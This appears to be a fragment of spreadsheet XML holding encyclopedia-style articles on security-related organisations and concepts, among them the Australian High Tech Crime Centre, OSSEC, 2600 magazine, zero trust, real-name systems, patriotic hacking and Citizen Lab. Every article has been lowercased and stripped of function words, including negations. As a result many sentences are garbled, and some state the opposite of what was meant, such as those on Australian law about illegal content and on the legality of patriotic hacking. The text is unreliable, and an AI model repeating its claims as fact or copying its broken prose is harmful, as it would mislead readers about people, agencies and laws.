    <t>Chris Kubasik</t>
  </si>
  <si>
    <t>christopher kubasik chair, chief executive officer l3harris technologies, provider global isr, communications networked systems, electronic systems military, homeland security commercial aviation customers. position, responsible leading execution l3harris's strategic growth objectives. biography career kubasik joined technologies october 2015. july 2017, board elected kubasik position president, board directors effective january 2018. when merged harris corporation 2019 form l3harris technologies, kubasik president chief operating officer company. appointed chief executive officer june 2021 appointed chair june 2022.prior joining kubasik president lockheed martin corporation. while role, ethics investigation confirmed chris long-term extramarital affair subordinate employee, november 2012, stevens, chairman ceo, asked received chris kubasik's resignation. education kubasik earned bachelor's degree (magna laude) accounting university maryland's school business 1983. 1997, attended executive program northwestern university’s kellogg school management. 2004, completed systems acquisition management course flag officers defense acquisition university, fort belvoir. also certified public accountant. references</t>
  </si>
  <si>
    <t>Australian High Tech Crime Centre</t>
  </si>
  <si>
    <t>australian high tech crime centre (ahtcc) hosted australian federal police (afp) headquarters canberra. under auspices afp, ahtcc party formal joint operating arrangement established afp, australian security intelligence organisation computer network vulnerability team australian signals directorate. ahtcc australian-wide policing initiative coordinate efforts australian enforcement combating serious, complex multi-jurisdictional internet-based crimes, particularly beyond capability individual police agencies australia. other roles include protecting information infrastructure australia, providing information enforcement help combat online crime. technological advancements, greater internet accessibility, seen growth cyber criminality. australian federal police established australian high tech crime centre prevent crimes occurring digital space. state community police work corporation combat cyber crime. overview technology advancements, including greater broader internet accessibility, boosted cybercrime. established ahtcc cease prevent online fraudulent behaviour. state community police work incorporation combat digital crime. ahtcc established july 2003, investigate online fraudulent matters currently directed kevin zuccato. ahtcc, today, continues fight cybercrime. commonwealth laws outline cybercrime regulations australia cybercrime defined “crimes directed computers information communications technologies (icts) (such computer intrusions denial service attacks), crimes computers icts integral part offence (such online fraud)”.digital attacks often conducted cyber adversaries, individuals groups people specialize conducting cyberattacks, online crime malicious activity. their activities destroy online businesses networks compromise public private data.malicious cyber activity risk organisations governments, including limited businesses hold public data. 1991, world-wide-web developed shared. this allowed crime occur internet, well offline. online interactions user relationships heightened ability cybercrime manifest spread.ahtcc's main role ‘discover levels online criminal activity’ undertake necessary measures prevent combat digital crime (platypus, 2009, ahtcc partnered large corporations, work's alongside australia's policing system effectively manage web-based criminal schemes. conduct initiatives, like publishing reports detail public prevent cybercrime. these reports educate businesses possible threats online transactions, customer communications, digital tools. ahtcc's website section victims digital offences report request help federal police.notably, ahtcc mitigated online criminality effectively maintained high level mediation cybercrime prevention. ahtcc deals different groups cybercrime including limited hackers, viruses, scammers, identity thieves, online terrorists. 2008, launched high tech crimes operations (htco) investigate child crimes digital acts child exploitation. exploitation children online continues issue globally. several organisations deal online criminality. australian cyber security centre (acsc), operated australian government, specialises digital safety security works closely ahtcc fight cybercrime. acsc allows public private join forces resolving cyber threats possible attacks. also work defense signals directorate (dsd) australian security intelligence organization (asio) effectively manage cyber-attacks would harm australia's business environment public sphere. history ahtcc established 2003, response rapid rise digital usage technological capabilities. growth internet potential provided capacities criminals engage online fraudulent activities. cybercrime existent since 1978 internet first established dispersed. security systems realised need continuous data moderation, monitoring user activity online offline. with rise e-commerce transactions ‘dark’ web/ ‘black market’ emerged targets users internet. 2003, beginning ahtcc, centre budget million annum operated staff, currently, staff working technology innovation security sector, total 6695 staff across board.the ahtcc adapted work line rise use. 1991, police able make video audio records interviews, wave digital records emerged. day, extremely present online, focusing detecting criminals know detected (afp, 2020). cybercrime prevention expensive exercise afp. 2013, estimated billion devices connected internet, increasing digital usage, comes targeted attacks criminal possibilities. security software company, symantec corporation, estimates that, 2010, cybercrime cost us$388 billion losses, globally. (weber, 2014, 54).the cybercrime introduced australian government 2001, outlining online offences prohibited. statistically, cybercrime significantly impacting australians. 2015, australians reported victims identity theft (veda report, 2015). 2015, australia significant data breach overseas, australian insurance company target cyberattack, criminals gained access prohibited government systems compromised finances notable businesses, damaging australia's security systems. solved this. working closely australians avoid cybercrime. “veda’s research 2015 found australians taking kind active precaution protect identity” (veda report, 2015). australia's approach australia follows commonwealth cybercrime regime, legislative system formed cybercrime 2011, considered computer crimes, traditional offline offences committed online, digital data misuse internet criminality. this amended, 2012 changed cybercrime amendment act, expanding definition cyber offences, online criminal possibilities broadened.however, current cybercrime policies australia, acknowledge ‘computer fraud’ criminal offence commonwealth law. ‘given borderless nature cybercrime, oversight national approach computer related fraud’ (weber, 68). roles functions cybercrime takes numerous forms, including identity theft, digital scams, hacking, online fraud, phishing. role ahtcc conjunction several government corporations, prevent reduce criminal behaviour online. partnership virtual global taskforce (vgt), includes major countries organisations, join forces combating cybercrime. globally, tackle international digital offences. cybercrime personal account hacking, involve breaching security government cooperation's networks, broader national impact.the australian government established australian cybercrime online reporting network (acorn) allow victims cybercrime report occurrences likewise organisations. 2015, acorn recorded cybercrime incidents, similarly, "australian federal police (afp) commander david mclean reported that, month alone, 3,500 people contacted police perceived cyber-crime" (broadhurst, 2017).there widespread dissemination pornographic content internet. user anonymity used conduct behaviour, tracing criminal behind crime difficult. some estimates suggest 20,000 images child porn posted online week (broadhurst, 2017). importantly, ahtcc taking effect child abuse material, continued circulate internet. australian police focusing closely child predators, targeting criminals threat society, keep online community safe free malicious dangerous offences. users access choose view illegal content online considered eyes australian law, guilty publish footage, thus free prosecution themselves. educating public offences part australian government security initiatives.technologies helping combat cybercrime. april 2016, australian prime minister allocated resources financial expenditure a$230 million fund cybercrime security measures ahtcc operations. funding important safety businesses individuals. notable cases australian federal police established ahtcc effectively control manage cybercrime. thus far, successful field. according afp, ‘over past years, australians arrested charged relation online sexual exploitation children’ concurrently, children posed risk criminals freed danger educated (afp, 2020). large part cybercrime pedophilia. organisations international pedophiles digital devices platforms exploit children, strategies like webcams online mechanisms like anonymity. afp's budget extensive, cover vast number cybercrime cases solutions. 2014, online russian crime syndicate hacked australian companies accessed 500,000 australian's financial details. ahtcc arrested members gang, seven criminals victoria thirteen spain. ahtcc responsible combating fraudulent activity effectively, avoiding major crime damaging australian economy broader national impact. ahtcc capable managing domestic international cybercrime work alongside large nations develop plans combat.recently, ahtcc highly successful case known ‘operation carpo’, whereby western australian prosecuted withholding 56,000 credit card details, 53,000 usernames passwords 110,000 domain names. success case, prevented several organised cybercrime's australia (afp). future australia facing increase cyber criminality technologies defeated maliciously targeted. australian government continues develop improve digital infrastructure security, loopholes discovered crime groups. australia, wealth high digital devices, attracts criminality organisations businesses. further, lack information reported cybercrime, proposes difficulty government bodies, like ahtcc, investigate resolve problem.as technology continues dominate marketplace, ahtcc vitally needed. always require investigatory teams, ahtcc mitigate cyber criminality. declare “our ongoing commitment stay least step ahead criminals involved form online crime” (afp, 2020).the government, 2016, introduced cyber security strategy, worth $230 million, improve maintain nation-wide digital security. initiatives program increase number cyber security workers, equip professionals necessary tools skills uphold qualifications. institutions offer cybersecurity courses, ensure australia remains front line digital crime technological advancements.the director ahtcc, kevin zuccato, works nationally countries establish cyber-security global scale. ahtcc part strategic alliance cyber crime working group, focuses transnational cybercrime building strong global relationships countries governments combat world-wide cyber-attacks together.the australian government also implemented numerous measures strategies prevent cybercrime, including, limited risk reduction protocols, multi-stakeholder approaches internet governing, internet neutrality, supporting human rights online, improve connectivity, technology innovation digital-ready workforces.all cyber defenders must work closely together minimise cyber criminality. australians businesses must report security breached incidents australian federal police, provide advice assistance preventing crimes occurring future. further, requires reporting cybercrime offences provides needed information order seize criminal behaviour online. also crime australia enforcement australia australian federal police australian government virtual global taskforce australian cyber security centre australian security intelligence organisation references external links australian high tech crime centre australian federal police australian cyber security centre australian security intelligence organisation</t>
  </si>
  <si>
    <t>Patch-through access</t>
  </si>
  <si>
    <t>patch-through access refers security clearance used various applications. according application, regarded high level security clearance. telephony corporate/defense applications, patch-through level clearance, allowing user telephony station (router) method another service, sometimes national phone network, often small telephony network owned company provides service, access services local station, modify options station itself. security corporate applications, patch-through high level clearance, allows user utilise company funds order make external calls (usually international high-rate locations). sense, patch-through useful saves employees work home company rebates expensive calls made behalf company.</t>
  </si>
  <si>
    <t>WolframAlpha</t>
  </si>
  <si>
    <t>wolframalpha wuulf-rəm-) computational knowledge engine answer engine developed wolfram research. answers factual queries directly computing answer externally sourced data.wolframalpha released 2009, based wolfram's earlier product wolfram mathematica, computational platform calculation, visualization, statistics capabilities. additional data gathered academic commercial websites cia's world factbook, united states geological survey, cornell university library publication called about birds, chambers biographical dictionary, jones, catalogue life, crunchbase, best buy, faa.it launched spanish 2022. technology overview users submit queries computation requests text field. wolframalpha computes answers relevant visualizations knowledge base curated, structured data come sites books. able respond particularly phrased natural language fact-based questions, complex questions. displays "input interpretation" question, using standardized phrases. mathematical symbolism parsed engine, responds numerical statistical results. development wolframalpha written wolfram language, general multi-paradigm programming language, implemented mathematica 10,000 cpus 2009. usage wolframalpha used power searches microsoft bing duckduckgo search engines currently used. factual question answering, previously queried apple's siri amazon alexa math science queries longer operational within services. wolframalpha data types available beginning july 2020 using microsoft excel, partnership ended favor microsoft power query data types. wolframalpha functionality microsoft excel deprecated june 2023. history launch preparations began 2009, p.m. broadcast live justin.tv. plan publicly launch service hours later. there issues extreme load. service officially launched 2009, receiving mixed reviews. 2009, wolfram alpha advocates pointed potential, even stating determines results important current usefulness. wolframalpha launched free attempt monetize service launching application cost $50, website free. that plan abandoned criticism.on february 2012, wolframalpha released, offering users additional features monthly subscription fee. copyright claims infoworld published article warning readers potential implications giving automated website proprietary rights data generates. free software advocate richard stallman also opposes idea recognizing site copyright holder suspects wolfram would able make case existing copyright law. also commonsense knowledge problem strong watson (computer) references external links official website</t>
  </si>
  <si>
    <t>OSSEC</t>
  </si>
  <si>
    <t>ossec (open source hids security) free, open-source host-based intrusion detection system (hids). performs analysis, integrity checking, windows registry monitoring, rootkit detection, time-based alerting, active response. provides intrusion detection operating systems, including linux, openbsd, freebsd, solaris windows. ossec centralized, cross-platform architecture allowing multiple systems easily monitored managed. ossec analysis engine able correlate analyze logs multiple devices formats. history june 2008, ossec project copyrights owned daniel cid, project leader, acquired third brigade, inc. they promised continue contribute open source community extend commercial support training ossec open source community. 2009, trend micro acquired third brigade ossec project, promises keep open source free. 2018, trend released domain name source code ossec foundation. ossec project currently maintained atomicorp stewards free open source version also offers enhanced commercial version. software components ossec consists main application, agent, interface. manager server), required distributed network stand-alone installations. agent, small program installed systems monitored. agentless mode, used monitor firewalls, routers, even unix systems. ossec features based intrusion detection (lid) actively monitors analyzes data multiple data points real-time. rootkit malware detection process file level analysis detect malicious applications rootkits. active response respond attacks changes system real time multiple mechanisms including firewall policies, integration parties cdn’s support portals, well self-healing actions. compliance auditing application system level auditing compliance many common standards pci-dss, benchmarks. file integrity monitoring (fim) files windows registry settings real time detects changes system, also maintains forensic copy data changes time. system inventory collects system information, installed software, hardware, utilization, network services, listeners information. ossec conferences since 2017, atomicorp running annual ossec conference, active developers members community together discuss ossec future.the 2019 ossec held march 20-21st outside washington slides materials conference available here. also host-based intrusion detection system comparison references external links official website</t>
  </si>
  <si>
    <t>PhilNITS</t>
  </si>
  <si>
    <t>philippine national information technology standards foundation, inc., philnits, non-stock, non-profit, non-government organization implementing philippines information technology standards adopted japan, support department trade industry (dti) philippines ministry economy, trade industry (meti) japan. history philnits initially known japanese standards exams philippines foundation, inc. (jitse-phil), registered securities exchange commission april 2002 office penthouse prince bldg, rada street, legazpi village, makati, week incorporation, japan engineers examination center (jitec) represented president, takao tominaga, signed mutual recognition agreement (mra) jitse-phil foundation, represented founding president, corazon akol ceremonies held makati shangri-la, manila hotel witnessed ambassador japan, secretary roxas department trade industry, chairman virgilio pena information technology e-commerce council (now commission information communications technology), yoshikai, deputy director general ministry economy, trade industry, sakai, commercial attache japan philippines. started support jitse-phil 2003 providing office space oppen building makati, 2005, building cebu city 2007, mintrade bldg. davao city. with jitec jitse-phil, able receive technical support japan. jitec providing guidance, training, necessary hardware/software programs, documentation required implementing standards fundamentals (fe) software design development (sw). 2003, bureau product standards (bps) department trade industry (dti), consultation national computer center (ncc), accepted jitse phil. national standard 2030:2003 information technology engineers skills standards. 2003, evaluation results first certification exams conducted jitse-phil fundamentals engineers (fe), ministry justice japan recognized jitse philippine nihon joho gijutsu hyojun shiken zaidan. with official recognition ministry justice, certificate, popularly called jitse certificate, used valid document processing work visas professionals bound japan. with asia initiative program (aiti) meti, jitse-phil able receive technical support japan japan external trade organization (jetro), association overseas technical scholarships (aots) center international cooperation computerization (cicc). jetro provided jitse-phil since 2003, japan expert service abroad (jexsa) project, technical experts training facilities offices makati, cebu, davao. aots provided training courses philippines various offices jitse-phil well schools provinces jitse-phil training center) awarded scholarships training japan. august 2004. jitse-phil changed name philnits foundation correct misconception standards implemented japanese market asia. itee conference held aots yokohama kenshu center, jitec organizations mutual recognition agreements (mras) jitec, decided form information technology professional examination council itpec. members itpec are: japan information technology examination center (jitec) japan, multimedia technology enhancement operations sendirian berhad (meteor) malaysia, myanmar computer federation (mcf) myanmar, japan-mongolian information technology association (jmita) mongolia, (now replaced national park, nitp), philippine national standards foundation (philnits) philippines, national electronics computer technology center (nectec) thailand, vietnam information technology examination training support center (vitec) vietnam. agreement, members decided common exam, agreed upon date time, recognize other’s certificate. itpec members using logo raise public recognition examination adopted common marketing strategy. jitec-ipa expects establish multi-lateral mutual recognition agreements, transform itpec fully asia-wide organization. through grants aots, philnits trained 8,174 professionals philippines sent scholars japan. cicc provided several training programs well learning system consisting hardware servers terminals), software (that accommodate maximum 2000 users) contents consisting modules developed jitec cicc module developed thomson learning center, donated fujitsu philnits. modules made available public, hours day, days week subscription ₱500.00 month. current certifications itpec certification exams (known locally philnits certification exams) administered written below. currently three levels examination administered philnits. topics covered exams technology, strategy management. professionals pass certification examinations certified life. professional take directly certification level he/she would want take. there limit number times take examinations pass exams. itpec fundamentals passport exam exam, level known locally philnits information technology passport exam individuals basic knowledge business workers commonly possess, information technology related tasks trying utilize related technology tasks. exam duration minutes hours (conducted morning schedule). consists questions multiple choice (one four choices) broke types: short question type, question item, questions; medium question type, four questions item, questions items). pilot examination conducted last march 2010. first regular exam conducted last october 2010. this exam conducted twice year last sunday april last sunday october. itpec fundamentals engineers exam exam, level known locally philnits exam conducted twice year last sunday april last sunday october. minute (150 minutes morning minutes afternoon) multiple choice examination administered exam centers philippines: university baguio north luzon area, philippine christian university manila, ateneo naga university bicol region, university carlos cebu holy name university bohol, lorma colleges union leyte academic center visayas region, mindanao: capitol university cagayan oro, ateneo zamboanga university zamboanga city university immaculate conception davao city. fundamental engineers exam individuals basic fundamental knowledge skills required advance human resource, possess practical utilization abilities. those fail either morning afternoon part exam given another chance take removal exam take entire test again. this means chances pass exam. itpec applied information technology exam exam, level known locally philnits conducted year last sunday october. multiple choice exam minutes (150 minutes morning minutes afternoon). this examination individuals applied knowledge skills required advanced human resource, established direction advanced human resource. ideally given people least years work experience. other projects conducting free training courses ap/sw teachers commercial trainers. usually funded grants aots, cicc, ipa, meti, jetro. conducting free summer training teachers, joint undertaking philippine society educators (psite) philippine accrediting association schools, colleges universities (paascu). paascu providing venue philnits providing lecturers (from philnits society). providing training using e-learning system donated japan. guiding helping development philnits society, organization formed whose criterion membership philnits-certified, exam category. conducting software hardware training. customized training assessment also available. conducting systems development outsourced projects. work done bridge software engineers nihongo proficient. board officers philnits are: corazon akol president peter operations shinichiro kato finance flora capili secretary. also itpec east asia japan meteor malaysia nitp mongolia myanmar nectec thailand vitec vietnam references external links philnits official website</t>
  </si>
  <si>
    <t>2600: The Hacker Quarterly</t>
  </si>
  <si>
    <t>2600: hacker quarterly american seasonal publication technical information articles, many written submitted readership, variety subjects including hacking, telephone switching systems, internet protocols services, well general news concerning computer "underground." with origins phone phreaking community late 20th-century counterculture, 2600 associated conference transitioned coverage modern hacker culture, magazine become platform speaking increased digital surveillance advocacy personal digital freedoms. publication history magazine's name comes phreaker discovery 1960s transmission 2600 hertz tone could produced perfectly plastic whistle given away free cap'n crunch cereal, discovered friends john draper long-distance trunk connection gained access "operator mode," allowed user explore aspects telephone system otherwise accessible. magazine given name david ruderman, co-founded magazine college friend, eric corley. ruderman ended direct involvement magazine three years later.the magazine traces origins early bulletin board systems place hackers share information stories other. launched 1984, coinciding book name break-up at&amp;t. published edited co-founder emmanuel goldstein name corley allusion george orwell's nineteen eighty-four) company 2600 enterprises, inc. 2600 released first friday month following season change, usually january, april, july, october.goldstein published compilation articles magazine entitled best 2600: hacker odyssey. book, 888-page hardcover, available july 2008 august 2008 published wiley. "hacker" term usage 2600 affiliates, often loaded term "hacking" refers grey hacking, generally understood sort technological utilization manipulation technology goes beyond capabilities inherent design given application. this usage attempts maintain neutrality, opposed politically charged often contentious terms white hacking (which consider hacking motivated exclusively good, benevolent intentions—such hardware modding penetration testing), black hacking consider hacking motivated exclusively malicious selfish intentions, electronic theft, vandalism, hijacking websites, types cybercrime.) other hackers believe hat-color labels oversimplification unnecessary designation, best suited media, suggest people hacking commit crimes already label, criminal. conferences meetings 2600 established h.o.p.e. (hackers planet earth) conference 1994, marking publication's tenth anniversary. conference held hotel pennsylvania, manhattan, york city, occurred every years exception second hope 1997, held puck building manhattan. convention features events presentations, talks, concerts, workshops. speakers included computer security figures hackers kevin mitnick, steven levy, richard stallman, steve wozniak, well whistleblowers william binney, daniel ellsberg, edward snowden, countercultural figures like jello biafra men.there monthly meetings countries. meetings listed back magazine, advertised open anyone regardless level expertise. media 2600 films produced feature-length documentary famed hacker kevin mitnick, free kevin movement hacker world, entitled freedom downtime, currently working titled speakers' world. corley also host wall hook, york talk radio shows. both shows downloaded streamed 2600 site, also broadcast various radio stations: hook broadcast wbai (99.5 wall broadcast wusb (90.1 fm).in 1995 movie hackers, character named emmanuel goldstein, also known "cereal killer" portrayed matthew lillard. court cases 2600 involved many court cases related technology freedom speech alongside electronic frontier foundation, perhaps significantly universal reimerdes involving distribution copy protection tool decss, courts upheld constitutionality digital millennium copyright anti-circumvention provisions.the magazine received copyright claim spatter stock image featured spring 2012 issue trunk archive, image licensing agency, using automated image tracking toolkit. while trunk archive identified image featured spatter source, discovered original spatter created finnish artist jukka korhonen, deviantart, released public domain. trunk archive later retracted claim sent letter 2600 apologizing mistake. also media portal references external links official website issn 0749-3851 2600 index 2600 index mirror searchable index 2600 hacker quarterly magazine article information.</t>
  </si>
  <si>
    <t>Zero trust security model</t>
  </si>
  <si>
    <t>zero trust security model (also, zero trust architecture, zero trust network architecture, zero trust network access, zta, ztna), sometimes known perimeterless security, describes approach design implementation systems. main concept behind zero trust security model "never trust, always verify,” means devices trusted default, even connected permissioned network corporate even previously verified. most modern corporate networks consist many interconnected zones, cloud services infrastructure, connections remote mobile environments, connections non-conventional devices. reasoning zero trust traditional approach trusting devices within notional "corporate perimeter", devices connected relevant complex environment corporate network. zero trust approach advocates mutual authentication, including checking identity integrity devices without respect location, providing access applications services based confidence device identity device health combination user authentication. history 1994 (april) term "zero trust" coined stephen paul marsh doctoral thesis computer security university stirling. marsh's work studied trust something finite described mathematically, asserting concept trust transcends human factors morality, ethics, lawfulness, justice, judgement.in 2003 challenges defining perimeter organisation's systems highlighted jericho forum year, discussing trend coined "de-perimiterisation".in 2009, google implemented zero trust architecture referred beyondcorp. 2010 term zero trust model used analyst john kindervag forrester research denote stricter cybersecurity programs access control within corporations.however, would take almost decade zero trust architectures become prevalent, driven part increased adoption mobile cloud services.in 2018, work undertaken united states cybersecurity researchers nist nccoe publication 800-207, zero trust architecture. publication defines zero trust (zt) collection concepts ideas designed reduce uncertainty enforcing accurate, per-request access decisions information systems services face network viewed compromised. zero trust architecture (zta) enterprise's cyber security plan utilizes zero trust concepts encompasses component relationships, workflow planning, access policies. therefore, zero trust enterprise network infrastructure (physical virtual) operational policies place enterprise product zero trust architecture plan. there several ways implement tenets full solution include elements three: using enhanced identity governance policy-based access controls. using micro-segmentation using overlay networks software-defined perimetersin 2019 united kingdom national cyber security centre (ncsc) recommended network architects consider zero trust approach deployments, particularly significant cloud services planned. alternative consistent approach taken ncsc, identifying principles behind zero trust architectures: single strong source user identity user authentication machine authentication additional context, policy compliance device health authorization policies access application access control policies within application also trust, verify (russian proverb) trust (internet security) blast radius references</t>
  </si>
  <si>
    <t>Anti-Malware Testing Standards Organization</t>
  </si>
  <si>
    <t>anti-malware testing standards organization (amtso) international non-profit organization 2008 address perceived need improvement quality, relevance objectivity anti-malware testing methodologies. stated objectives according amtso site, organization's charter lists following objectives: providing forum discussions related testing anti-malware related products. developing publicizing objective standards best practices testing anti-malware related products. promoting education awareness issues related testing anti-malware related products. providing tools resources standards-based testing methodologies. organization until 2012 amtso administered elected unpaid board directors, strategic input advisory board, committees handle specific operations membership, fees, subsequently, major infrastructural change took place, introducing executive team ceo, cto, marketing strategy addition already existing board. membership while grew discussions security vendors security product testing organizations, membership amtso also open academics, reviewers, publications, include individual members. however, high cost full membership generally discourages individual members small organizations joining, early 2011, organization offered much cheaper subscription rate didn't, however, offer full voting rights. amtso currently offers two-tier membership model: entity members full benefits membership, individual members benefits apart right vote. membership controversy some members wider security community even testers raised issue organization's membership, includes preponderance security vendors. work organization created potentially useful resources testers, including page flags relevant papers resources outside amtso, repository guidelines documents benefit aspiring testers wide range topics. another popular freely available resource security features check, attempts download faux malicious file desktop android device. this simple test ensure basic anti-malware standards implemented test device.it also organizes workshops three times year: discussion generation guidelines documents major by-product sessions. references external links amtso main site twitter account facebook page</t>
  </si>
  <si>
    <t>Real-name system</t>
  </si>
  <si>
    <t>real-name system system users register account blog, website bulletin board system using legal name. users required provide identification credentials legal name. public pseudonym also used, person's identity available legal authorities criminal investigations. real-name systems employed websites facebook quora. history real name systems originated government regulations. governments provided citizens official surnames. this allowed track property ownership inheritance, collect taxes, maintain court records, perform police work, conscript soldiers control epidemics. germany privacy reasons, germany’s 1997 telemediengesetz (nowadays: ttdsg) allow forcing people real-names real-name necessary internet service. 27th january, 2022, highest court civil matters, bundesgerichtshof, decided facebook’s pseudonyms illegal users registered gdpr implemented 2018. south korea south korea first country internet real-name system practice. since 2009, korean websites implemented name registration system compliance south korea's amended information communications network act. this enforced suicide choi jin-sil, believed related malicious bulletin board comments her. real name systems minimize amount negative information published internet encourage netizens responsible online behavior. south koreans familiar offline real-name systems since 1990s, legislation introduced required real name used property financial transactions. august 2011 hackers accessed databases real-name system, obtaining registration numbers million people.on august 2012, constitutional court korea ruled unanimously real-name requirements imposed portal service providers unconstitutional, claiming violates freedom speech cyberspace. result, so-called "choi jin-sil law" discarded. constitutional court said: system seem beneficial public. despite enforcement system, number illegal malicious postings online decreased. instead, users moved foreign websites system became discriminatory domestic operators. also prevented foreigners didn’t resident registration number expressing opinions online. china chinese government 2011 promulgated regulations development management microblogging, stated microblogging sites ensure users registered real names. major microblogging sites like sina weibo, sohu agreed real name systems practice march 2012. users provided real information would barred posting transmitting messages thereafter. june 2017, chinese cybersecurity took effect, requiring everyone uses chinese websites provide phone number. china's state-run media claimed would provide "safe real" internet environment.with respect video games, chinese regulations require real-name authentication ("real-name id") since january 2020. regulations become stringent june 2021, requiring authentication government system instead third-party services. regulations curb excessive gaming minors. people restricted regulations minutes gaming 08:00 22:00 (180 minutes holidays), also subject restrictions in-app payments based age. social networking sites facebook facebook employs real-name system. online name policy states: "facebook community people real identities. require everyone provide real names, always know connecting with. this helps keep community safe." this strongly encourages users provide real names creating account. facebook's first users university students. according danah boyd, social media scholar, "people provided name site extension campus life." later users adopted norms practices early adopters. real names contributed quality quantity information facebook users. facebook became identity service encouraging users share lives, including real names.emil protalinski, technology journalist next web, states "facebook users pseudonyms hide stalkers, abusive exes, even governments condone free speech." pseudonyms allow users connect colleagues, friends, family without compromising safety. "people feel though privacy violated agency undermined information particular social context obscured ways subvert people's ability make informed decision reveal." some users feel uncomfortable displaying real names choose fake name appears real others. twitter unlike facebook, twitter social networking site require real-names twitter accounts. according former dick costolo twitter care real names. whether information comes account real name using pseudonym matter. however, twitter verifies accounts prominent users celebrities businesses order protect identity theft/fraud. references</t>
  </si>
  <si>
    <t>Numina Application Framework</t>
  </si>
  <si>
    <t>numina application framework product numina solutions provides single sign-on capabilities application framework building applications. features features numina application framework include authentication ldap, openid, local database. saml openid identity provider application, authorization, access control management domain, group, user management brute force prevention password complexity, expiration, history, strength meters dashboard accessing applications components there three main components numina application framework: front-end application, authentications system management. service, provides information front-end application well applications utilizing application framework. developer tools, provide wrappers service tools build client applications. also single sign-on application framework service-oriented architecture enterprise software identity management list single sign-on implementations external links official site</t>
  </si>
  <si>
    <t>Patriotic hacking</t>
  </si>
  <si>
    <t>patriotic hacking term computer hacking system cracking citizens supporters country, traditionally industrialized western countries increasingly developing countries, attempt perpetrate attacks block attacks perceived enemies state. recent media attention focused efforts related terrorists attempts conduct online electronic intifada cyberterrorism. patriot hacking illegal countries united states rise elsewhere. "the said recent experience showed increase international tension mirrored online world rise cyber activity defacements denial service attacks," according bbc. examples onset iraq 2003, concerned increase hack attacks intensity conflict grew. since then, becoming increasingly popular north america, western europe israel. these countries greatest threat islamic terrorism aforementioned digital version.around time 2008 summer olympics torch relay, marred unrest tibet, chinese hackers claim hacked websites (accused selective reporting 2008 lhasa riots) carrefour french shopping chain, allegedly supporting tibetan independence), websites forums gave tutorials launch ddos attack specifically website.indian hackers 2015 took thousands pakistani websites including pakistan.gov.pk right information pakistan attack named #opvijaya leadership in73ct0r d3vil. this attack considered patriotic move indian hackers. government india india's ajit dhoval showed support attack twitter account.the official websites different indian universities hacked defaced 2017. group going name ‘pakistan haxor crew’ (pfc) claimed responsibility breach, saying retaliation pakistan’s railway ministry website hacked indian crew days breach. aurat foundation's database leaked.on 26th 2022 pakistan sindh high court heard petition indian hacker going name shivang gupta publically leaking database aurat foundation pakistan. also 2007 cyberattacks estonia black hacking exploit (computer security) cyber spying cyber storm exercise cyber warfare grey hacker (computer security) hacker ethic hack value hacktivism internet vigilantism risk metasploit penetration test vulnerability (computing) white (computer security) references</t>
  </si>
  <si>
    <t>Citrix Technology Professional</t>
  </si>
  <si>
    <t>according citrix, citrix technology professional (ctp) award given individuals "who invested significant amount time resources become experts citrix products solutions." awardees shared knowledge helped citrix community presence. history program launched 2006 11-well known citrix community members. according brian madden's article, citrix tried create program similar microsoft most valuable professional program years. program called "cvp" program citrix stopped program, according brian madden. initial members first briforum 2006 program born. criteria program seen highly selective since citrix caps program individuals year. applications taken annually based number applicants current ctps retiring, number stays ctps less. limit, program allows leave keep alumni status, however able participate receive benefits. ctps must non-citrix employees conflict interest competing employer arrangement. benefits ctps able participate road maps planning citrix products technologies access product managers employees citrix. ctps also speak citrix events promote company trade shows, online presence demos. benefits include paid attendance citrix events. references external links citrix site awardee site</t>
  </si>
  <si>
    <t>Citizen Lab</t>
  </si>
  <si>
    <t>citizen interdisciplinary laboratory based munk school global affairs university toronto, canada. founded ronald deibert 2001. laboratory studies information controls impact openness security internet pose threats human rights. organization uses "mixed methods" approach combines computer-generated interrogation, data mining, analysis intensive field research, qualitative social science, legal policy analysis methods. citizen founding partner opennet initiative (2002–2013) information warfare monitor (2002–2012) projects. organization also developed original design psiphon censorship circumvention software, spun private canadian corporation (psiphon inc.) 2008. history 2009 report "tracking ghostnet", researchers uncovered suspected cyber espionage network 1,295 infected hosts countries 2007 2009, high percentage high-value targets, including ministries foreign affairs, embassies, international organizations, news media, ngos. study first public reports reveal cyber espionage network targeted civil society government systems internationally.in shadows cloud (2010), researchers documented complex ecosystem cyber espionage systematically compromised government, business, academic, computer network systems india, offices dalai lama, united nations, several countries. according january 2019 news report, citizen researchers "being targeted" "international undercover operatives" work group.in million dollar dissident, published august 2016, researchers discovered ahmed mansoor, five, human rights defender united arab emirates, targeted pegasus software developed israeli "cyber war" company group. prior releases report, researchers contacted apple released security update patched vulnerabilities exploited spyware operators. mansoor imprisoned year later 2021, still jail.researchers reported october 2018, group surveillance software used "inner circle" jamal khashoggi murder, "are targeted turn international undercover operatives." citizen october report revealed nso's "signature software" placed iphone saudi dissident omar abdulaziz, khashoggi's confidantes, months before. abdulaziz said saudi arabia spies used hacking software reveal khashoggi's "private criticisms saudi royal family". said "played major role" death.in march 2019, york times reported citizen target contractor darkmatter.in november 2019, ronan farrow released podcast called "catch kill," extension book name. first episode includes farrow's reporting instance source farrow's involved counter-espionage incident operatives black cube targeting citizen lab. funding financial support citizen come ford foundation, open society institute, social sciences humanities research council canada, international development research centre (idrc), government canada, canada centre global security studies university toronto's munk school global affairs, john catherine macarthur foundation, donner canadian foundation, open technology fund, walter duncan gordon foundation. citizen received donations software support virustotal, riskiq cisco’s threat grid team research areas digital attacks citizen lab's targeted threats research stream seeks gain better understanding technical social nature digital attacks civil society groups political context motivate them. citizen conducts comparative analysis various online threats, including internet filtering, denial-of-service attacks, targeted malware. targeted threats reports covered number espionage campaigns information operations tibetan community diaspora, phishing attempts made journalists, human rights defenders, political figures, international investigators anti-corruption advocates mexico, prominent human rights advocate focus government surveillance united arab emirates.citizen researchers collaborators like electronic frontier foundation also revealed several different malware campaigns targeting syrian activists opposition groups context syrian civil war. many findings translated arabic disseminated along recommendations detecting removing malware. group reports work analyzing spyware used target opposition figures south america triggered death threats. september 2015 members group received pop-up said:we're going analyze brain bullet—and family's, like playing going shouldn't, well know cost—your life! internet censorship opennet initiative studied internet filtering countries found them—including authoritarian democratic regimes—implement level filtering.the citizen continued research area internet censorship (iclab), project aimed developing systems methods measuring internet censorship. collaborative effort citizen lab, professor phillipa gill's group stony brook university's department computer science, professor nick feamster's network operations internet security group princeton university. application-level information controls citizen studies censorship surveillance implemented popular applications including social networks, instant messaging, search engines. previous work includes investigations censorship practices search engines provided google, microsoft, yahoo! chinese market along domestic chinese search engine baidu. 2008, nart villeneuve found tom-skype (the chinese version skype time) collected stored millions chat records publicly accessible server based china. 2013, citizen researchers collaborated professor jedidiah crandall ph.d. student jeffrey knockel university mexico reverse engineering tom-skype sina another instant messaging application used china. team able obtain 